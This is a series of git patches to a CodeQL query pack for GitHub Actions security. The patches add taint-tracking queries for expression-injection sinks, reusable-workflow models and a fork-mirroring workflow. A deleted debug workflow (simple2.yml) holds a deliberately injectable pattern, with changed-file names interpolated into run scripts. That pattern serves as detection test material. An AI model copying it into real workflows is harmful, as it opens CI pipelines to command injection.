codeqlDatabaseCreate(codeql) { // get runner temp directory for database var temp = process.env["RUNNER_TEMP"]; @@ -28734,84 +28722,6 @@ async function codeqlDatabaseAnalyze(codeql, database_path) { exports.codeqlDatabaseAnalyze = codeqlDatabaseAnalyze; -/***/ }), - -/***/ 1772: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - var desc = Object.getOwnPropertyDescriptor(m, k); - if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { - desc = { enumerable: true, get: function() { return m[k]; } }; - } - Object.defineProperty(o, k2, desc); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.clonePackRepo = exports.runCommandJson = exports.runCommand = exports.newGHConfig = void 0; -const path = __importStar(__nccwpck_require__(1017)); -const core = __importStar(__nccwpck_require__(2186)); -const toolrunner = __importStar(__nccwpck_require__(8159)); -async function newGHConfig() { - return { - path: "/usr/bin/", - }; -} -exports.newGHConfig = newGHConfig; -async function runCommand(config, args) { - var bin = path.join(config.path, "gh"); - let output = ""; - var options = { - listeners: { - stdout: (data) => { - output += data.toString(); - }, - }, - }; - await new toolrunner.ToolRunner(bin, args, options).exec(); - core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); - return output.trim(); -} -exports.runCommand = runCommand; -async function runCommandJson(config, args) { - return JSON.parse(await runCommand(config, args)); -} -exports.runCommandJson = runCommandJson; -async function clonePackRepo(gh, path) { - try { - await runCommand(gh, [ - "repo", - "clone", - "GitHubSecurityLab/codeql-actions", - path, - ]); - return true; - } - catch (error) { - core.warning("Failed to clone pack from GitHub..."); - } - return false; -} -exports.clonePackRepo = clonePackRepo; - - /***/ }), /***/ 6144: @@ -28847,17 +28757,12 @@ exports.run = void 0; const path = __importStar(__nccwpck_require__(1017)); const core = __importStar(__nccwpck_require__(2186)); const cql = __importStar(__nccwpck_require__(950)); -const gh = __importStar(__nccwpck_require__(1772)); /** * The main function for the action. * @returns {Promise} Resolves when the action is complete. */ async function run() { try { - // set up gh - var ghc = await gh.newGHConfig(); - core.debug(`GH CLI found at '${ghc.path}'`); - await gh.runCommand(ghc, ["version"]); // set up codeql var codeql = await cql.newCodeQL(); core.debug(`CodeQL CLI found at '${codeql.path}'`); @@ -28873,21 +28778,17 @@ async function run() { core.setFailed("CodeQL Yaml extractor not installed"); throw new Error("CodeQL Yaml extractor not installed"); } - core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); - let pack_path = "/tmp/codeql-actions"; - var pack_cloned = await gh.clonePackRepo(ghc, pack_path); - core.info(`Cloned CodeQL Actions pack into '${pack_path}'`); - if (pack_cloned === false) { - throw new Error("Could not clone the actions ql pack"); - } - core.info(`Installing CodeQL Actions packs from '${pack_path}'`); - var pack_installed = await cql.installPack(codeql, pack_path); - if (pack_installed === false) { - throw new Error("Could not install the actions ql packs"); - } - core.info(`Pack path: '${pack_path}'`); - codeql.pack = path.join(pack_path, "ql", "src"); - core.info(`Codeql Queries pack path: '${codeql.pack}'`); + // download pack + core.info(`Downloading CodeQL IaC pack '${codeql.pack}'`); + var pack_downloaded = await cql.downloadPack(codeql); + if (pack_downloaded === false) { + var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); + codeql.pack = path.join(action_path, "ql", "src"); + core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); + } + else { + core.info(`Pack downloaded '${codeql.pack}'`); + } core.info("Creating CodeQL database..."); var database_path = await cql.codeqlDatabaseCreate(codeql); core.info("Running CodeQL analysis..."); diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 7cb1dab48e59..ad787814448d 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -106,20 +106,6 @@ export async function downloadPack(codeql: CodeQLConfig): Promise { return false; } -export async function installPack( - codeql: CodeQLConfig, - dir: string, -): Promise { - try { - await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); - return true; - } catch (error) { - core.warning("Failed to install local packs ..."); - } - return false; -} - export async function codeqlDatabaseCreate( codeql: CodeQLConfig, ): Promise { diff --git a/.github/action/src/gh.ts b/.github/action/src/gh.ts deleted file mode 100644 index 668e559e40bf..000000000000 --- a/.github/action/src/gh.ts +++ /dev/null @@ -1,59 +0,0 @@ -import * as path from "path"; -import * as core from "@actions/core"; -import * as toolrunner from "@actions/exec/lib/toolrunner"; - -export interface GHConfig { - // The path to the codeql bundle. - path: string; -} - -export async function newGHConfig(): Promise { - return { - path: "/usr/bin/", - }; -} - -export async function runCommand( - config: GHConfig, - args: string[], -): Promise { - var bin = path.join(config.path, "gh"); - let output = ""; - var options = { - listeners: { - stdout: (data: Buffer) => { - output += data.toString(); - }, - }, - }; - - await new toolrunner.ToolRunner(bin, args, options).exec(); - core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); - - return output.trim(); -} - -export async function runCommandJson( - config: GHConfig, - args: string[], -): Promise { - return JSON.parse(await runCommand(config, args)); -} - -export async function clonePackRepo( - gh: GHConfig, - path: string, -): Promise { - try { - await runCommand(gh, [ - "repo", - "clone", - "GitHubSecurityLab/codeql-actions", - path, - ]); - return true; - } catch (error) { - core.warning("Failed to clone pack from GitHub..."); - } - return false; -} diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index 717782b555cf..b07bef25e84c 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -1,7 +1,6 @@ import * as path from "path"; import * as core from "@actions/core"; import * as cql from "./codeql"; -import * as gh from "./gh"; /** * The main function for the action. @@ -9,13 +8,6 @@ import * as gh from "./gh"; */ export async function run(): Promise { try { - // set up gh - var ghc = await gh.newGHConfig(); - - core.debug(`GH CLI found at '${ghc.path}'`); - - await gh.runCommand(ghc, ["version"]); - // set up codeql var codeql = await cql.newCodeQL(); @@ -36,26 +28,19 @@ export async function run(): Promise { throw new Error("CodeQL Yaml extractor not installed"); } - core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); - let pack_path = "/tmp/codeql-actions"; - var pack_cloned = await gh.clonePackRepo(ghc, pack_path); - core.info(`Cloned CodeQL Actions pack into '${pack_path}'`); + // download pack + core.info(`Downloading CodeQL IaC pack '${codeql.pack}'`); + var pack_downloaded = await cql.downloadPack(codeql); - if (pack_cloned === false) { - throw new Error("Could not clone the actions ql pack"); - } - - core.info(`Installing CodeQL Actions packs from '${pack_path}'`); - var pack_installed = await cql.installPack(codeql, pack_path); + if (pack_downloaded === false) { + var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); + codeql.pack = path.join(action_path, "ql", "src"); - if (pack_installed === false) { - throw new Error("Could not install the actions ql packs"); + core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); + } else { + core.info(`Pack downloaded '${codeql.pack}'`); } - core.info(`Pack path: '${pack_path}'`); - codeql.pack = path.join(pack_path, "ql", "src"); - core.info(`Codeql Queries pack path: '${codeql.pack}'`); - core.info("Creating CodeQL database..."); var database_path = await cql.codeqlDatabaseCreate(codeql); diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index 7380ae46d07c..78fec3b00eb5 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -15,7 +15,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - - uses: dorny/paths-filter@4512585405083f25c027a35db413c2b3b9006d50 + - uses: dorny/paths-filter@v3 id: changes with: filters: | @@ -26,5 +26,3 @@ jobs: - name: Run action if: steps.changes.outputs.src == 'true' uses: ./ - with: - extractor-version: latest diff --git a/ql/lib/codeql/actions/DataFlow.qll b/ql/lib/codeql/actions/DataFlow.qll index 5040865be1d2..1e30061bf459 100644 --- a/ql/lib/codeql/actions/DataFlow.qll +++ b/ql/lib/codeql/actions/DataFlow.qll @@ -7,12 +7,13 @@ module DataFlow { private import codeql.actions.dataflow.internal.DataFlowImplSpecific import DataFlowMake import codeql.actions.dataflow.internal.DataFlowPublic - - /** debug */ + // debug private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific import codeql.dataflow.internal.DataFlowImplConsistency as DFIC + module ActionsConsistency implements DFIC::InputSig { } + module Consistency { - import DFIC::MakeConsistency - } + import DFIC::MakeConsistency + } } From 8ae1e26d5d2072f4c38ed841a6b5f174b6a54c9b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 15:49:29 +0100 Subject: [PATCH 053/707] fix(action): qls reference --- .github/action/dist/index.js | 4 ++-- .github/action/src/codeql.ts | 2 +- .github/action/src/index.ts | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 501ce250969e..e931e22d3f8a 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28707,7 +28707,7 @@ async function codeqlDatabaseAnalyze(codeql, database_path) { codeql_output, ]; // remote pack or local pack - if (codeql.pack.startsWith("GitHubSecurityLab/")) { + if (codeql.pack.startsWith("githubsecuritylab/")) { var suite = codeql.pack + ":" + codeql.suite; } else { @@ -28779,7 +28779,7 @@ async function run() { throw new Error("CodeQL Yaml extractor not installed"); } // download pack - core.info(`Downloading CodeQL IaC pack '${codeql.pack}'`); + core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); var pack_downloaded = await cql.downloadPack(codeql); if (pack_downloaded === false) { var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index ad787814448d..48750388e570 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -148,7 +148,7 @@ export async function codeqlDatabaseAnalyze( ]; // remote pack or local pack - if (codeql.pack.startsWith("GitHubSecurityLab/")) { + if (codeql.pack.startsWith("githubsecuritylab/")) { var suite = codeql.pack + ":" + codeql.suite; } else { // assume path diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index b07bef25e84c..b1a4fc80c644 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -29,7 +29,7 @@ export async function run(): Promise { } // download pack - core.info(`Downloading CodeQL IaC pack '${codeql.pack}'`); + core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); var pack_downloaded = await cql.downloadPack(codeql); if (pack_downloaded === false) { From 43a55e80a9991a6347a26ff452893ad32f3397cd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 16:02:10 +0100 Subject: [PATCH 054/707] feat(model-generator): New qls for modelling composite actions --- action.yml | 8 ++------ ql/src/Security/CWE-020/CompositeActionSummaries.ql | 1 + ql/src/Security/CWE-020/CompositeActionsSources.ql | 1 + ql/src/codeql-suites/actions-summaries-queries.qls | 8 ++++++++ 4 files changed, 12 insertions(+), 6 deletions(-) create mode 100644 ql/src/codeql-suites/actions-summaries-queries.qls diff --git a/action.yml b/action.yml index ed6eb327a9ed..61fd380c4189 100644 --- a/action.yml +++ b/action.yml @@ -8,16 +8,12 @@ inputs: source-root: description: "Path of the root source code directory, relative to $GITHUB_WORKSPACE." - default: "./" + default: ${{ github.workspace }} - sarif: + sarif-output: description: "SARIF File Output" default: "codeql-actions.sarif" -# runs: -# using: "node16" -# main: ".github/action/dist/index.js" - runs: using: 'composite' steps: diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionSummaries.ql index 875492644b85..e2843326e74e 100644 --- a/ql/src/Security/CWE-020/CompositeActionSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionSummaries.ql @@ -7,6 +7,7 @@ * @precision high * @id actions/composite-action-summaries * @tags actions + * model-generator * external/cwe/cwe-020 */ diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 19c43ad30661..67adac7dd324 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -7,6 +7,7 @@ * @precision high * @id actions/composite-action-sources * @tags actions + * model-generator * external/cwe/cwe-020 */ diff --git a/ql/src/codeql-suites/actions-summaries-queries.qls b/ql/src/codeql-suites/actions-summaries-queries.qls new file mode 100644 index 000000000000..5526197c7db2 --- /dev/null +++ b/ql/src/codeql-suites/actions-summaries-queries.qls @@ -0,0 +1,8 @@ +- description: Queries to model composite actions +- queries: . + +- include: + kind: + - path-problem + tags contain: + - model-generator From 4e44444d5a40de132104f3bd45138e58f6ae0396 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 16 Feb 2024 16:03:01 +0100 Subject: [PATCH 055/707] Add copy workflow --- .github/workflows/copy-to-bughalla.yml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 .github/workflows/copy-to-bughalla.yml diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml new file mode 100644 index 000000000000..943935caa4a2 --- /dev/null +++ b/.github/workflows/copy-to-bughalla.yml @@ -0,0 +1,20 @@ +name: Copy to Bughalla + +on: push + +permissions: + contents: read + +jobs: + copy: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + + - run: gh auth setup-git + env: + GITHUB_TOKEN: ${{ secrets.BUGHALLA_TOKEN }} + + - run: rm -rf .github/workflows/copy-to-bughalla.yml + - run: git remote add fork https://github.com/bughalla/codeql-actions + - run: git push fork master --force From 7c3503e6c72c30057954534b5c65a8a0b3b5e4ec Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 16:03:38 +0100 Subject: [PATCH 056/707] fix: remove debug leftovers --- .github/workflows/simple2.yml | 42 ----------------------------------- 1 file changed, 42 deletions(-) delete mode 100644 .github/workflows/simple2.yml diff --git a/.github/workflows/simple2.yml b/.github/workflows/simple2.yml deleted file mode 100644 index b40f5eb6ac05..000000000000 --- a/.github/workflows/simple2.yml +++ /dev/null @@ -1,42 +0,0 @@ -name: CI - -on: - pull_request: - branches: - - main - -jobs: - changed_files: - runs-on: ubuntu-latest - name: Test changed-files - steps: - - uses: actions/checkout@v4 - with: - fetch-depth: 0 - - - name: Get changed files - id: source - uses: tj-actions/changed-files@v40 - - - name: Remove foo from changed files - id: step - uses: mad9000/actions-find-and-replace-string@3 - with: - source: ${{ steps.source.outputs.all_changed_files }} - find: 'foo' - replace: '' - - - name: List all changed files - id: sink - run: | - for file in ${{ steps.step.outputs.value }}; do - echo "$file was changed" - done - - - name: List all changed files - id: no-flow - run: | - for file in ${{ steps.source.outputs.all_changed_files_count }}; do - echo "$file was changed" - done - From 5cb9c21e05ccf0dc2fd860059213820fee5d64f0 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 16 Feb 2024 16:06:05 +0100 Subject: [PATCH 057/707] Fetch before push --- .github/workflows/copy-to-bughalla.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml index 943935caa4a2..87506a217f6e 100644 --- a/.github/workflows/copy-to-bughalla.yml +++ b/.github/workflows/copy-to-bughalla.yml @@ -17,4 +17,5 @@ jobs: - run: rm -rf .github/workflows/copy-to-bughalla.yml - run: git remote add fork https://github.com/bughalla/codeql-actions + - run: git fetch fork - run: git push fork master --force From 334fda18ba16dd2fd3878d680997a709f15a29b1 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Fri, 16 Feb 2024 16:39:40 +0100 Subject: [PATCH 058/707] Fix copy workflow --- .github/workflows/copy-to-bughalla.yml | 26 ++++++++++++++++++-------- 1 file changed, 18 insertions(+), 8 deletions(-) diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml index 87506a217f6e..9e0fee9a0f7e 100644 --- a/.github/workflows/copy-to-bughalla.yml +++ b/.github/workflows/copy-to-bughalla.yml @@ -10,12 +10,22 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - - - run: gh auth setup-git - env: - GITHUB_TOKEN: ${{ secrets.BUGHALLA_TOKEN }} + with: + token: ${{ secrets.BUGHALLA_TOKEN }} + fetch-depth: 0 - - run: rm -rf .github/workflows/copy-to-bughalla.yml - - run: git remote add fork https://github.com/bughalla/codeql-actions - - run: git fetch fork - - run: git push fork master --force + - run: | + rm -rf .github/workflows/copy-to-bughalla.yml + git remote set-url --push origin git@github.com:bughalla/codeql-actions + git config user.name 'github-actions[bot]' + git config user.email 'github-actions[bot]@users.noreply.github.com' + git add -v . + git commit -m 'Actions: Add patch' + + - name: Push changes + uses: ad-m/github-push-action@35284cf030a5836cb567a7bf1b39ebafbfae5f4a + with: + repository: bughalla/codeql-actions + github_token: ${{ secrets.BUGHALLA_TOKEN }} + branch: ${{ github.ref }} + force: true \ No newline at end of file From 1d582a4c4d21e3bf272a8a547c076493821354dc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 20 Feb 2024 10:50:02 +0100 Subject: [PATCH 059/707] feat(model-generation): Add more model generation queries Add new queries for finding reusable workflows that behave as summaries, sources or sinks. Add new query for finding composite actions that behave as sinks. Add `github.event.inputs` context to the regular expression matching input var accesses. --- ql/lib/codeql/actions/Ast.qll | 5 +- .../CWE-020/CompositeActionSummaries.ql | 4 +- .../Security/CWE-020/CompositeActionsSinks.ql | 42 +++++++++++++++++ .../CWE-020/CompositeActionsSources.ql | 4 +- .../CWE-020/ReusableWorkflowsSinks.ql | 42 +++++++++++++++++ .../CWE-020/ReusableWorkflowsSources.ql | 46 +++++++++++++++++++ .../CWE-020/ReusableWorkflowsSummaries.ql | 37 +++++++++++++++ 7 files changed, 177 insertions(+), 3 deletions(-) create mode 100644 ql/src/Security/CWE-020/CompositeActionsSinks.ql create mode 100644 ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql create mode 100644 ql/src/Security/CWE-020/ReusableWorkflowsSources.ql create mode 100644 ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index b04694ed5689..605f658b263b 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -369,7 +369,10 @@ private string jobsCtxRegex() { private string envCtxRegex() { result = "\\benv\\.([A-Za-z0-9_-]+)\\b" } -private string inputsCtxRegex() { result = "\\binputs\\.([A-Za-z0-9_-]+)\\b" } +private string inputsCtxRegex() { + result = "\\binputs\\.([A-Za-z0-9_-]+)\\b" or + result = "\\bgithub\\.event\\.inputs\\.([A-Za-z0-9_-]+)\\b" +} /** * Holds for an expression accesing the `steps` context. diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionSummaries.ql index e2843326e74e..b451d9d1bda2 100644 --- a/ql/src/Security/CWE-020/CompositeActionSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionSummaries.ql @@ -31,5 +31,7 @@ module MyFlow = TaintTracking::Global; import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink -where MyFlow::flowPath(source, sink) +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() select sink.getNode(), source, sink, "Summary" diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql new file mode 100644 index 000000000000..525307bcc28b --- /dev/null +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -0,0 +1,42 @@ +/** + * @name Composite Action Sinks + * @description Actions passing input variables to expression injection sinks. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/composite-action-sinks + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class ExpressionInjectionSink extends DataFlow::Node { + ExpressionInjectionSink() { + exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + externallyDefinedSink(this, "expression-injection") + } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Sink" diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 67adac7dd324..b3eb6d348a85 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -40,5 +40,7 @@ module MyFlow = TaintTracking::Global; import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink -where MyFlow::flowPath(source, sink) +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() select sink.getNode(), source, sink, "Source" diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql new file mode 100644 index 000000000000..9317b9001581 --- /dev/null +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -0,0 +1,42 @@ +/** + * @name Reusable Workflow Sinks + * @description Reusable Workflows passing parameters to an expression injection sink. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/reusable-wokflow-sinks + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class ExpressionInjectionSink extends DataFlow::Node { + ExpressionInjectionSink() { + exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + externallyDefinedSink(this, "expression-injection") + } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(_) = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Sink" diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql new file mode 100644 index 000000000000..eeea688b273f --- /dev/null +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql @@ -0,0 +1,46 @@ +/** + * @name Reusable Workflow Sources + * @description Reusable Workflow that pass user-controlled data to their output variables. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/reusable-workflow-sources + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + not source instanceof DataFlow::ParameterNode and + exists(ReusableWorkflowStmt w | w.getAChildNode*() = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { + exists(ReusableWorkflowStmt w | w.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + } + + predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { + allowImplicitRead(node, set) + or + isSink(node) and + set instanceof DataFlow::FieldContent + } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Source" diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql new file mode 100644 index 000000000000..3949488e1298 --- /dev/null +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql @@ -0,0 +1,37 @@ +/** + * @name Reusable Workflows Summaries + * @description Reusable workflow that pass user-controlled data to their output variables. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/reusable-workflow-summaries + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(_) = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { + exists(ReusableWorkflowStmt w | w.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Summary" From 010d7df71d36ec98e41f03827fcc14fc949ad1b6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 20 Feb 2024 11:58:54 +0100 Subject: [PATCH 060/707] feat(reusable-workflow-models): Reusable workflow MaD Add support to define sources/sinks/summaries for Reusable Workflows as MaD entries. --- .../actions/controlflow/internal/Cfg.qll | 16 ++------------- .../dataflow/internal/DataFlowPrivate.qll | 20 ++++++++++++++++++- .../dataflow/internal/DataFlowPublic.qll | 11 ++++++++++ ql/lib/ext/TEST-RW-MODELS.model.yml | 17 ++++++++++++++++ ql/lib/test/test.ql | 13 ++++++------ .../.github/workflows/calling_workflow.yml | 16 +++++++++++---- 6 files changed, 67 insertions(+), 26 deletions(-) create mode 100644 ql/lib/ext/TEST-RW-MODELS.model.yml diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 8808fb0afe53..94a2c6a71e2c 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -243,21 +243,9 @@ private class JobTree extends StandardPreOrderTree instanceof JobStmt { } } -private class StepUsesTree extends StandardPreOrderTree instanceof StepUsesExpr { - override ControlFlowTree getChildNode(int i) { - result = - rank[i](Expression child, Location l | - (child = super.getArgumentExpr(_) or child = super.getEnvExpr(_)) and - l = child.getLocation() - | - child - order by - l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - ) - } -} +private class UsesExprTree extends LeafTree instanceof UsesExpr { } -private class JobUsesTree extends StandardPreOrderTree instanceof JobUsesExpr { +private class UsesTree extends StandardPreOrderTree instanceof UsesExpr { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 89f31983189a..e1a3479cfc0e 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -58,7 +58,7 @@ class DataFlowExpr extends Cfg::Node { } /** - * A call corresponds to a Uses steps where a 3rd party action or a reusable workflow gets called + * A call corresponds to a Uses steps where a 3rd party action or a reusable workflow get called */ class DataFlowCall instanceof Cfg::Node { DataFlowCall() { super.getAstNode() instanceof UsesExpr } @@ -180,6 +180,23 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { ) } +/** + * Holds if there is a local flow step between a ${{ needs.xxx.outputs.yyy }} expression accesing a job output field + * and the step output itself. But only for those cases where the job (needs) output is defined externally in a MaD Source + * specification. The reason for this is that we don't currently have a way to specify that a source starts with a + * non-empty access path so we cannot write a Source that stores the taint in a Content, we can only do that for steps + * (storeStep). The easiest thing is to add this local flow step that simulates a read step from the source node for a specific + * field name. + */ +predicate needsCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(UsesExpr astFrom, NeedsCtxAccessExpr astTo | + externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getRefExpr() = astFrom + ) +} + /** * Holds if there is a local flow step between a ${{}} expression accesing an input variable and the input itself * e.g. ${{ inputs.foo }} @@ -215,6 +232,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { 